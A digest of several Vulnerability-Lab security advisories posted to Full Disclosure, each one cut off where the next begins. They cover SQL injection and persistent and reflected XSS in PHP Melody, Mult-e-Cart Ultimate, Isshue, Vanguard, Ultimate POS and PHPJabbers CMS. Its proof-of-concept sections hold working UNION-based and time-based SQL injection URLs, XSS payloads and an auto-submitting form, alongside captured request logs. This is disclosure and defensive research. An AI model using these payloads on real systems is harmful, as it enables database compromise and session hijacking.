[FD] PHP Melody v3.0 - (vid) SQL Injection Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
PHP Melody v3.0 - (vid) SQL Injection Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2295

Bulletin: 
https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/


Release Date:
=
2021-10-20


Vulnerability Laboratory ID (VL-ID):

2295


Common Vulnerability Scoring System:

7


Vulnerability Class:

SQL Injection


Current Estimated Price:

1.000€ - 2.000€


Product & Service Introduction:
===
Upload, import, stream or embed any media. The smart way to manage audio & 
video. Comes with all the tools you need for online publishing.
Beautiful content for your site. Allow users to create their channels, 
subscribe and follow the content they like. Podcast, mini-series,
TV shows or movies. Everything is easier to publish with our CMS. Invest in a 
Secure Foundation. Build with a proven CMS.

(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a remote 
sql-injection web vulnerability in the PHP Melody v3.0 video cms 
web-application.


Affected Product(s):

PHPSUGAR
Product: PHP Melody v3.0 - Video CMS (Web-Application)


Vulnerability Disclosure Timeline:
==
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-09-04: Vendor Response/Feedback (Security Department)
2021-09-22: Vendor Fix/Patch (Service Developer Team)
2021-09-22: Security Acknowledgements (Security Department)
2021-10-20: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
High


Authentication Type:

Full Authentication (Admin/Root Privileges)


User Interaction:
=
No User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

A remote sql-injection vulnerability has been discovered  in the PHP Melody 
v3.0 video cms web-application.
The vulnerability allows remote attackers to inject or execute own sql commands 
to compromise the dbms or
file system of the web-application.

The remote sql injection vulnerability is located in the `vid` parameter of the 
`edit-video.php` file.
Remote attackers with moderator or admin access privileges are able to execute 
own malicious sql commands
by inject get method request. The vid parameter in the acp ui is not sanitized 
properly. Thus allows an
attacker to inject own sql commands to compromise the web-application and dbms.

Exploitation of the remote sql injection vulnerability requires no user 
interaction but a privileged moderator or admin account.
Successful exploitation of the remote sql injection results in database 
management system, web-server and web-application compromise.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] Video Edit

Vulnerable File(s):
[+] edit-video.php

Vulnerable Parameter(s):
[+] vid


Proof of Concept (PoC):
===
The remote sql-injection web vulnerability can be exploited by authenticated 
remote attackers without user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.


Original:
https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd&a=4&page=1&filter=added&fv=desc


PoC: Exploitation #1
https://phpmelody.localhost:8000/admin/edit-video.php?vid=-3435b47dd' UNION ALL 
SELECT NULL,NULL,NULL,NULL,NULL,NULL,
CONCAT(0x7171766b71,0x5642646a536b77547366574a4c43577866565270554f56426b6175535a55764259514b6c486e6e69,0x71626a6271),
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--


PoC: Exploitation #2
https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd-' AND 
(SELECT 1446 FROM (SELECT(SLEEP([SLEEPTIME])))--


PoC: Exploit


phpmelody vid sql injection poc
https://phpmelody.localhost:8000/admin/edit-video.php?vid=-3435b47dd' UNION 
ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,
CONCAT(0x7171766b71,0x5642646a536b77547366574a4c43577866565270554f56426b6175535a55764259514b6c486e6e69,0x71626a6271),
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--">

https://phpmelody.localhost:8000/admin/edit-video.php?vid=3435b47dd-' AND 
(SELECT 1446 FROM (SELECT(SLEEP([SLEEPTIME])))--">




Reference(s):
https://phpmelody.localhost:8000/
https://phpmelody.localhost:8000/admin/
https://phpmelody.localhost:8000/admin/edit-video.php


Solution - Fix & Patch:
===
The vulnerability c

[FD] PHP Melody v3.0 - (Editor) Persistent XSS Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
PHP Melody v3.0 - (Editor) Persistent XSS Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2291

Bulletin: 
https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/


Release Date:
=
2021-10-21


Vulnerability Laboratory ID (VL-ID):

2291


Common Vulnerability Scoring System:

5.4


Vulnerability Class:

Cross Site Scripting - Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
Upload, import, stream or embed any media. The smart way to manage audio & 
video. Comes with all the tools you need for online publishing.
Beautiful content for your site. Allow users to create their channels, 
subscribe and follow the content they like. Podcast, mini-series,
TV shows or movies. Everything is easier to publish with our CMS. Invest in a 
Secure Foundation. Build with a proven CMS.

(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )



Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a persistent cross 
site web vulnerability in the PHP Melody v3.0 video cms web-application.


Affected Product(s):

PHPSUGAR
Product: PHP Melody v3.0 - Video CMS (Web-Application)


Vulnerability Disclosure Timeline:
==
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-09-04: Vendor Response/Feedback (Security Department)
2021-09-22: Vendor Fix/Patch (Service Developer Team)
2021-09-22: Security Acknowledgements (Security Department)
2021-10-20: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Restricted Authentication (Moderator Privileges)


User Interaction:
=
Low User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

A persistent input validation web vulnerability has been discovered in PHP 
Melody v3.0 video cms web-application.
The vulnerability allows remote attackers to inject own malicious script codes 
with persistent attack vector to
compromise browser to web-application requests from the application-side.

The persistent cross site web vulnerability is located in the video editor 
(WYSIWYG) with the tinymce class.
Privileged user accounts like edtiors are able to inject own malicious script 
code via editor to provoke a
public execution by users oder administrators. The request method to inject is 
get and after save in dbms
via post method the attack vector becomes persistent.

Successful exploitation of the vulnerability results in session hijacking, 
persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation of affected 
application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Editor - Videos (WYSIWYG - tinymce)

Vulnerable File(s):
[+] edit-episode.php

Vulnerable Parameter(s):
[+] episode_id

Affected Module(s):
[+] description


Proof of Concept (PoC):
===
The persistent validation vulnerability can be exploited by remote attackers 
with privileged editor user account and with low user interaction.
For security demonstration or to reproduce the web vulnerability follow the 
provided information and steps below to continue.

PoC: Payload
">">"
href="https://phpmelody.localhost.com:8080/admin/">">">">">">


--- PoC Session Logss (GET) [WYSIWYG] ---
https://phpmelody.localhost.com:8080/admin/[PWND]
Host: phpmelody.localhost.com:8080
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer: 
https://phpmelody.localhost.com:8080/admin/edit-episode.php?episode_id=1
Cookie: PHPSESSID=aac20732ffd23b7d11815fa2b8f2e12a; 
melody_d900e07810ba03257e53baf46a9ada6f=admin;
melody_key_d900e07810ba03257e53baf46a9ada6f=cc33e6eb60d2c1e31a5612bd8c193c88;
cookieconsent_dismissed=yes; sidebar-main-state=maxi; 
watched_video_list=MSw0LDUsNw%3D%3D;
pm_elastic_player=normal; aa_import_from=youtube; 
guest_name_d900e07810ba03257e53baf46a9ada6f=admin
-
GET: HTTP/2.0 200 OK
content-type: text/html;
vary: Accept-Encoding


Vulnerable Source: Video Editor (WYSIWYG - tinymce)





Reference(s):
https://phpmelody.localhost.c

[FD] PHP Melody v3.0 - (submitted) Persistent XSS Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
PHP Melody v3.0 - (submitted) Persistent XSS Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2292

Bulletin: 
https://www.phpsugar.com/blog/2021/09/php-melody-3-0-vulnerability-report-fix/


Release Date:
=
2021-10-21


Vulnerability Laboratory ID (VL-ID):

2292


Common Vulnerability Scoring System:

5.6


Vulnerability Class:

Cross Site Scripting - Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
Upload, import, stream or embed any media. The smart way to manage audio & 
video. Comes with all the tools you need for online publishing.
Beautiful content for your site. Allow users to create their channels, 
subscribe and follow the content they like. Podcast, mini-series,
TV shows or movies. Everything is easier to publish with our CMS. Invest in a 
Secure Foundation. Build with a proven CMS.

(Copy of the Homepage: https://www.phpsugar.com/phpmelody.html )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a persistent cross 
site web vulnerability in the PHP Melody v3.0 video cms web-application.


Affected Product(s):

PHPSUGAR
Product: PHP Melody v3.0 - Video CMS (Web-Application)


Vulnerability Disclosure Timeline:
==
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-09-04: Vendor Response/Feedback (Security Department)
2021-09-22: Vendor Fix/Patch (Service Developer Team)
2021-09-22: Security Acknowledgements (Security Department)
2021-10-20: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Restricted Authentication (Moderator Privileges)


User Interaction:
=
Low User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

A persistent input validation web vulnerability has been discovered in PHP 
Melody v3.0 video cms web-application.
The vulnerability allows remote attackers to inject own malicious script codes 
with persistent attack vector to
compromise browser to web-application requests from the application-side.

The persistent input validation web vulnerability is located in the `submitted` 
parameter of the `edit-video.php`.
Remote attackers with privileged user accounts like editors or moderators are 
able to inject own malicious script
code as author that submits. The request method to inject is post and the 
execution occurs with persistent attack
vector in the `watch.php` frontend file.

Successful exploitation of the vulnerability results in session hijacking, 
persistent phishing attacks, persistent
external redirects to malicious source and persistent manipulation of affected 
application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Edit Video

Vulnerable File(s):
[+] edit-video.php

Vulnerable Parameter(s):
[+] submitted

Affected File(s):
[+] watch.php


Proof of Concept (PoC):
===
The persistent validation vulnerability can be exploited by remote attackers 
with privileged editor user account and with low user interaction.
For security demonstration or to reproduce the web vulnerability follow the 
provided information and steps below to continue.


PoC: Example Exploitation
[Username]"><[PAYLOAD]">

PoC: Payload
admin">


--- PoC Session Logs (POST) [edit-video.php - submitted] ---
https://phpmelody.localhost:8080/admin/edit-video.php?vid=22389808b
Host: phpmelody.localhost:8080
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; 
boundary=---3331529921260143328403993122
Content-Length: 6517
Origin: https://phpmelody.localhost:8080
Connection: keep-alive
Referer: https://phpmelody.localhost:8080/admin/edit-video.php?vid=22389808b
Cookie: 
PHPSESSID=2ae8ef3142c4517892e6333cee49612a;melody_d900e07810ba03257e53baf46a9ada6f=admin;
melody_key_p900e07810ba03257e53baf46a9ada3c=cc33e6eb60d2c1e31a5612bd8c193c22;
sidebar-main-state=maxi; watched_video_list=MTI0LDE%3D; pm_elastic_player=normal
post:
submit=Save&video_title=Hi- 
Test&video_slug=martin-garrix-high-on-life-ft-bonn&file=,,&description=test2&tags=high,high on 
life,martin,garrix&yt_min=3&yt_sec=48&yt_length=228&allow_comments=1&allow_embedding=1&restricted=0&site_views=6&site_views_input=6&date_month=9&date_day=03
&date_year=2021&date_hour=07&date_min=00&date_ampm=am&date_sec=09&submitted=admin">
&direct=https://www.videosourcesi

[FD] Mult-e-Cart Ultimate v2.4 - SQL Injection Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
Mult-e-Cart Ultimate v2.4 - SQL Injection Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2306


Release Date:
=
2021-10-22


Vulnerability Laboratory ID (VL-ID):

2306


Common Vulnerability Scoring System:

7


Vulnerability Class:

SQL Injection


Current Estimated Price:

1.000€ - 2.000€


Product & Service Introduction:
===
Digital Multivendor Marketplace Online Store - eShop CMS

(Source: https://ultimate.multecart.com/ & https://www.techraft.in/ )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered multiple 
sql-injection web vulnerabilities in the Mult-e-Cart Ultimate v2.4 (v2021) 
web-application.


Affected Product(s):

Techraft
Product: Digital Multivendor Marketplace Online Store v2.4 - eShop CMS 
(Web-Application)


Vulnerability Disclosure Timeline:
==
2021-10-22: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
High


Authentication Type:

Restricted Authentication (Moderator Privileges)


User Interaction:
=
No User Interaction


Disclosure Type:

Independent Security Research


Technical Details & Description:

Multiple classic sql-injection web vulnerabilities has been discovered in the 
Mult-e-Cart Ultimate v2.4 (v2021) web-application.
The web vulnerability allows remote attackers to inject or execute own sql 
commands to compromise the database management system.

The vulnerabilities are located in the `id` parameter of the `view` and 
`update` function. The vulnerable modules are `inventory`,
`customer`, `vendor` and `order`. Remote attackers with a vendor shop account 
are able to exploit the vulnerable id parameter to
execute malicious sql commands. The request method to inject is get and the 
attack vector is located on the client-side. The remote
vulnerability is a classic order by sql-injection. The issue is exploitable 
with one of the two vendor roles or higher privileged
roles like admin.

Exploitation of the remote sql injection vulnerabilities requires no user 
interaction and a privileged vendor- or admin role user account.
Successful exploitation of the remote sql injection results in database 
management system, web-server and web-application compromise.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] inventory/inventory/update
[+] /customer/customer/view
[+] /vendor/vendor/view
[+] /order/sub-order/view-order

Vulnerable Parameter(s):
[+] id


Proof of Concept (PoC):
===
The remote sql injection web vulnerabilities can be exploited by remote 
attackers with privileged backend panel access without user interaction.
For security demonstration or to reproduce the remote sql-injection web 
vulnerability follow the provided information and steps below to continue.


PoC: Payloads
1' union select 1,2,3,4,@@version--&edit=t
1' union select 1,2,3,4,@@database--&edit=t


PoC: Exploitation
https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union 
select 1,2,3,4,5--&edit=t
https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 
1,2,3,4,5--&edit=t
https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 
1,2,3,4,5--&edit=t
https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union 
select 1,2,3,4,5
-
https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union 
select 1,2,3,4,5&edit=t
https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 
1,2,3,4,5&edit=t
https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 
1,2,3,4,5&edit=t
https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union 
select 1,2,3,4,5


PoC: Exploit


Mult-E-Cart Ultimate - SQL Injection PoC
https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 
1,2,3,4,@@database--&edit=t" width="400" height="400">
https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select 
1,2,3,4,@@database--&edit=t" width="400" height="400">
https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select 
1,2,3,4,@@database--&edit=t" width="400" height="400">
https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 
1,2,3,4,@@database--" width="400" height="400">

https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select 
1,2,3,4,@@version--&edit=t" width="400" height="400">
https://multecartultimate.localhost:8080/customer/cu

[FD] Isshue Shopping Cart v3.5 - Cross Site Web Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
Isshue Shopping Cart v3.5 - Cross Site Web Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2284


Release Date:
=
2021-10-22


Vulnerability Laboratory ID (VL-ID):

2284


Common Vulnerability Scoring System:

5.1


Vulnerability Class:

Cross Site Scripting - Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
Multi-store eCommerce shopping cart software is the complete solution for 
eCommerce business management. It is all in one package for website management
with backend admin panel to manage inventory, order, product, invoicing & so 
on. No need regular monthly subscription fee, get it through one-time payment now.
Your eCommerce business frequently changes with the times. All you need is a 
system that will make your work easier and time-saving. You need the best
eCommerce shopping cart software which is flexible, upgradable, affordable. 
Isshue is a completely secure and fast eCommerce POS system for eCommerce
solutions. Isshue is the best choice for any type of e-commerce business, big 
or small.

(Copy of the Homepage: 
https://www.bdtask.com/multi-store-ecommerce-shopping-cart-software/ )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a persistent 
validation vulnerability in the Isshue eCommerce Shopping Cart v3.5 
web-application.


Affected Product(s):

bdtask
Product: Isshue Shopping Cart v3.5 - eCommerce (Web-Application)


Vulnerability Disclosure Timeline:
==
2021-08-23: Researcher Notification & Coordination (Security Researcher)
2021-08-24: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-22: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Restricted Authentication (Moderator Privileges)


User Interaction:
=
Medium User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

A persistent input validation web vulnerability has been discovered in the 
official Isshue eCommerce Shopping Cart v3.5 web-application.
The vulnerability allows remote attackers to inject own malicious script codes 
with persistent attack vector to compromise browser to
web-application requests from the application-side.

A input validation web vulnerability has been discovered in the title input fields 
in `new invoice`, `customer` & `stock` modules.
The `title` input and parameter allows to inject own malicious script code with 
persistent attack vector. The content of the input
and parameter is insecure validated, thus allows remote attackers with 
privileged user accounts (manager/keeper/admin) to inject
own malformed script code that executes on preview. The request method to 
inject is post and the attack vector is persistent on
the application-side.

Successful exploitation of the vulnerability results in session hijacking, 
persistent phishing attacks, persistent external redirects
to malicious source and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Edit Title

Vulnerable Input(s):
[+] Title

Vulnerable Parameter(s):
[+] title

Affected Module(s):
[+] stock
[+] customer
[+] invoice


Proof of Concept (PoC):
===
The persistent input validation web vulnerability can be exploited by remote 
attackers with keeper account and with low user interaction.
For security demonstration or to reproduce the persistent cross site web 
vulnerability follow the provided information and steps below to continue.


Vulnerable Source:




"[MALICIOUS INJECTED SCRIPT CODE!]

Edit title

Unpin

Reload

Minimize
Fullscreen

Close

https://isshue.bdtask.com/isshue_v4_demo4/dashboard/Store_invoice/new_invoice"; class="form-vertical" id="validate" 
name="insert_invoice" enctype="multipart/form-data" method="post" accept-charset="utf-8" novalidate="novalidate">




Customer Name *






--- PoC Session Logs (GET) [Execute] ---
https://isshue.localhost:8080/isshue/dashboard/Store_invoice/evil.source
Host: isshue.localhost:8080
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer: 
https://isshue.localhost:8080/isshue/dashboard/Store_invoice/new_invoice
Cookie: ci_session=f16fc8ac874d2fbefd4f1bc818e9361e563a9535; 
bm=29207327b

[FD] Vanguard v2.1 - (Search) POST Inject Web Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
Vanguard v2.1 - (Search) POST Inject Web Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2283


Release Date:
=
2021-10-26


Vulnerability Laboratory ID (VL-ID):

2283


Common Vulnerability Scoring System:

4


Vulnerability Class:

Cross Site Scripting - Non Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
https://codecanyon.net/item/vanguard-marketplace-digital-products-php/20287975


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a post inject web 
vulnerability in the Vanguard v2.1 cms web-application.


Affected Product(s):

VanguardInfini
Product: Vanguard v2.1 - CMS (PHP) (Web-Application)



Vulnerability Disclosure Timeline:
==
2021-10-26: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Pre Auth (No Privileges or Session)


User Interaction:
=
Low User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

A non-persistent post inject web vulnerability has been discovered in the 
official Vanguard v2.1 cms web-application.
The vulnerability allows remote attackers to inject malicious script code in 
post method requests to compromise user
session data or to manipulate application contents for clients.

The vulnerability is located in the phps_query parameter of the search module. 
The vulnerability is a classic post
injection web vulnerability with non-persistent attack vector.

Successful exploitation of the vulnerability results in session hijacking, 
non-persistent phishing attacks, non-persistent
external redirects to malicious source and non-persistent manipulation of 
affected application modules.

Request method(s):
[+] POST

Vulnerable Input(s):
[+] Search

Vulnerable Parameter(s):
[+] phps_query


Proof of Concept (PoC):
===
The client-side post inject web vulnerability can be exploited by remote 
attackers without account and with low or medium user interaction.
For security demonstration or to reproduce the cross site web vulnerability 
follow the provided information and steps below to continue.


Vulnerable Source: search


https://vanguard.squamifer.ovh/search";>

" 
placeholder="Search for a product...">
Search




No results found for .



--- PoC Session Logs [POST] ---
https://vanguard.localhost:8080/search
Host: vanguard.localhost:8080
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 86
Origin: https://vanguard.localhost:8080
Connection: keep-alive
Referer: https://vanguard.localhost:8080/
Cookie: PHPSESSID=57d86e593a55e069d1e6c728ce20b3b8
phps_query=">%20&phps_search=;)
-
POST: HTTP/2.0 200 OK
content-type: text/html; charset=UTF-8
pragma: no-cache
cache-control: private
vary: Accept-Encoding


Exploitation: PoC


PoC

#nodisplay {
display:none;
}




https://vanguard.localhost:8080/search"; method="post">




function submitForm() {
document.forms[0].submit();
}
submitForm();





Security Risk:
==
The security risk of the validation web vulnerability in the web-application is 
estimated as medium.


Credits & Authors:
==
Vulnerability-Lab [Research Team] - 
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab


Disclaimer & Information:
=
The information provided in this advisory is provided as it is without any 
warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and 
capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct, 
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been 
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or 
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies, deface 
websites, hack into databases or trade with stolen data.

Domains:www.vulnerability-lab.com   www.vuln-lab.com
www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com  paste.vulnerability-db.com  
infosec.vulnerability-db.com
Social: twitter.com/vuln_la

[FD] Ultimate POS v4.4 - (Products) Persistent XSS Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
Ultimate POS v4.4 - (Products) Persistent XSS Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2296


Release Date:
=
2021-10-26


Vulnerability Laboratory ID (VL-ID):

2296


Common Vulnerability Scoring System:

5.6


Vulnerability Class:

Cross Site Scripting - Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
The Ultimate POS is a erp, stock management, point of sale & invoicing 
web-application.
The application uses a mysql database management system in combination with php 
7.2.

(Copy of the Homepage: https://ultimatefosters.com/docs/ultimatepos/ )



Abstract Advisory Information:
==
Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a non-persistent 
cross site vulnerability in the Ultimate POS v4.4 erp stock management 
web-application.


Affected Product(s):

thewebfosters
Ultimate POS v4.4 - ERP (Web-Application)


Vulnerability Disclosure Timeline:
==
2021-10-26: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Restricted Authentication (Moderator Privileges)


User Interaction:
=
Low User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

A persistent cross site web vulnerability has been discovered in the Ultimate 
POS v4.4 erp stock management web-application.
The vulnerability allows remote attackers to inject own malicious script codes 
with persistent attack vector to compromise
browser to web-application requests from the application-side.

The persistent validation web vulnerability is located in the name parameter of 
the add products module.
Remote attackers with privileges as vendor to add products are able to inject 
own malicious script codes.
The request method to inject is post and the attack vector is persistent. 
Injects are possible via edit
or by a new create of a product.

Successful exploitation of the vulnerabilities results in session hijacking, 
persistent phishing attacks,
persistent external redirects to malicious source and persistent manipulation 
of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Products (Add)

Vulnerable Input(s):
[+] Product Name

Vulnerable Parameter(s):
[+] name

Affected Module(s):
[+] Products List


Proof of Concept (PoC):
===
The persistent web vulnerability can be exploited by remote attackers with 
privileged application account and with low user interaction.
For security demonstration or to reproduce the cross site web vulnerability 
follow the provided information and steps below to continue.


PoC: Payload
test">
test">


 PoC Session Logs (POST) [Add] ---
https://pos-uf.localhost.com:8000/products
Host: pos-uf.localhost.com:8000
Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; 
boundary=---241608710739044240961361918599
Content-Length: 3931
Origin: https://pos-uf.localhost.com:8000
Connection: keep-alive
Referer: https://pos-uf.localhost.com:8000/products/create
Cookie: 
ultimate_pos_session=eyJpdiI6InpjMmNRMEkycnU3MDIzeksrclNrWlE9PSIsInZhbHVlIjoiYmJWVjFBZWREODZFN3BCQ3praHZiaVwvV
nhSMGQ1ZmM1cVc0YXZzOUg1YmpMVlB4VjVCZE5xMlwvNjFCK056Z3piIiwibWFjIjoiNmY3YTNiY2Y4MGM5NjQwNDYxOTliN2NjZWUxMWE4YTNhNmQzM2U2ZGRlZmI3OWU4ZjkyNWMwMGM2MDdkMmI3NSJ9
_token=null&name=test">&sku=&barcode_type=C128&unit_id=1&brand_id=
&category_id=&sub_category_id=&product_locatio[]=1&enable_stock=1&alert_quantity=&product_description=&image=&product_brochure=
&weight=&product_custom_field1=&product_custom_field2=&product_custom_field3=&product_custom_field4=&woocommerce_disable_sync=0&tax=&tax_type=exclusive
&type=single&single_dpp=2.00&single_dpp_inc_tax=2.00&profit_percent=25.00&single_dsp=2.50&single_dsp_inc_tax=2.50&variation_images[]=&submit_type=submit
-
POST: HTTP/3.0 200 OK
content-type: text/html; charset=UTF-8
location: https://pos-uf.localhost.com:8000
set-cookie: 
ultimate_pos_session=eyJpdiI6IndzZmlwa1ppRGZkaUVlUU1URTgwT1E9PSIsInZhbHVlIjoiMklXdGZWa250THhtTCtrMnhEU2I3UlAyXC8ydmdqSU5NcTJLZTVpR2FxYUptb
khvdjhMR0pmYW13Unorc2VuNHEiLCJtYWMiOiJkYWMyYTY3Y2ExNjI0NTdlY2Y2YzhlNTk4ZmZiZjQzZGYwMTRmYjBlYmJiNjA1MzZjNjYyNmVjOGEzNjVmMzczIn0%3D;
 Max-Age=7200; path=/; httponly


 PoC Session Logs (POST) [Edit] ---
https://pos-uf.localhost.com:8000/products/23
Host: pos-uf.localhost.com:8000
Accept: 

[FD] PHPJabbers Simple CMS v5 - Persistent XSS Vulnerability

[i...@vulnerability-lab.com]

Document Title:
===
PHPJabbers Simple CMS v5 - Persistent XSS Vulnerability


References (Source):

https://www.vulnerability-lab.com/get_content.php?id=2300


Release Date:
=
2021-10-28


Vulnerability Laboratory ID (VL-ID):

2300


Common Vulnerability Scoring System:

5.4


Vulnerability Class:

Cross Site Scripting - Persistent


Current Estimated Price:

500€ - 1.000€


Product & Service Introduction:
===
A simple PHP content management system for easy web content editing and 
publishing. Our PHP Content Management System script is designed
to provide you with powerful yet easy content administration tools. The smart 
CMS lets you create and manage multiple types of web sections
and easily embed them into your website. You can upload a wide range of files 
and add users with different user access levels. Get the
Developer License and customize the script to fit your specific needs.

(Copy of the Homepage:https://www.phpjabbers.com/simple-cms/  )


Abstract Advisory Information:
==
The vulnerability laboratory core research team discovered a persistent input 
validation vulnerability in the PHPJabbers Simple CMS v5.0 web-application.


Affected Product(s):

PHPJabbers
Product: PHPJabbers Simple CMS v5.0 - (Web-Application)


Vulnerability Disclosure Timeline:
==
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2021-10-28: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=
Published


Exploitation Technique:
===
Remote


Severity Level:
===
Medium


Authentication Type:

Restricted Authentication (Moderator Privileges)


User Interaction:
=
Low User Interaction


Disclosure Type:

Responsible Disclosure


Technical Details & Description:

A persistent input validation web vulnerability has been discovered  in the in 
the PHPJabbers Simple CMS v5.0 web-application.
The vulnerability allows remote attackers to inject own malicious script codes 
with persistent attack vector to compromise
browser to web-application requests from the application-side.

The persistent vulnerability is located in the create (pjActionCreate) and 
update (pjActionUpdate) post method request.
Privileged authenticated accounts with ui access are able to inject own 
malicious script code as name for users.
The script code execution is performed after the inject via post method in the 
user list (pjAdminUsers).

Successful exploitation of the vulnerabilities results in session hijacking, 
persistent phishing attacks, persistent external
redirects to malicious source and persistent manipulation of affected 
application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Create (Add)
[+] Update

Vulnerable Parameter(s):
[+] pjActionCreate
[+] pjActionUpdate

Affected Module(s):
[+] pjAdminUsers


Proof of Concept (PoC):
===
The persistent web vulnerability can be exploited by remote attackers with 
privilged user accounts with low user interaction.
For security demonstration or to reproduce the vulnerability follow the 
provided information and steps below to continue.


PoC: Payloads
">
">


--- PoC Session Logs (POST) [Add & Update]
